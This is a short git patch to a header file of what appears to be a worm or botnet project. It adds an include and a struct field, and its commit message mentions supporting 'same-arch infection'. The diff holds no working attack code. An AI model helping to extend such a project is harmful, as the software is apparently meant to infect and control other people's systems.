From 5a98bcd78867b4fb1a272ce26774c8811f28750d Mon Sep 17 00:00:00 2001 From: David Timber Date: Thu, 22 Jul 2021 22:30:48 +1000 Subject: Impl PRNE_HTBT_OP_RCB ... * Parameterize prne_start_bin_rcb() args * Change value of PRNE_ARCH_NONE to 0 to use it over the wire (problem arises deserialising) * tostr() and fstr() functions set errno to EINVAL * Run bne without binary archive to support same-arch infection --- src/htbt.h | 2 ++ 1 file changed, 2 insertions(+) (limited to 'src/htbt.h') diff --git a/src/htbt.h b/src/htbt.h index 3d6a42c..45debf0 100644 --- a/src/htbt.h +++ b/src/htbt.h @@ -2,6 +2,7 @@ #include "pth.h" #include "resolv.h" #include "protocol.h" +#include "pack.h" #include @@ -35,6 +36,7 @@ struct prne_htbt_param { prne_resolv_t *resolv; prne_htbt_cbset_t cb_f; void *cb_ctx; + const prne_rcb_param_t *rcb; int blackhole; }; -- cgit